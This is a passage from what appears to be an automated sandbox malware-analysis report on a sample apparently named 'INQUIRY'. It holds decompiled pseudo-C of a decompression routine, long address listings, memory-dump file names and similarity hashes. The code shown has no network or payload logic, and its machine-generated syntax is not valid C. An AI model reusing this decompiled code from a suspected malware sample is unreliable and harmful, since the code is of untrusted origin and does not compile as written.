													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406409
0x00406409
0x0040640d
0x0040641a
0x00406424
0x00000000
0x0040640f
0x0040640f
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x0040640d

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
